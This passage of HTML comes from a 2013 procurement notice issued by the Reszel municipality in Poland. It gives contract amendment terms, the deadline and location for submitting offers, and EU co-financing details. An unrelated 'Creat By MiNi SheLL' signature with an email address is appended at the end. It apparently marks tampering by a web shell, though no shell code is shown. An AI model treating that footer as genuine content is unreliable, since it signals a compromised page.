a) inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
b) uzasadnienie zmian - w szczególności: prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych robót,
c) forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/reszel_gmina_miejsko_-_wiejska/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Techniczno-Budowlany, 11-440 Reszel, ul. Reymonta 1-4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2013 godzina 12:00, miejsce: Urząd Gminy w Reszlu, ul. Rynek 24, 11-440 Reszel - pok. z napisem Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego 
w  ramach Programu Operacyjnego Warmia i Mazury na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com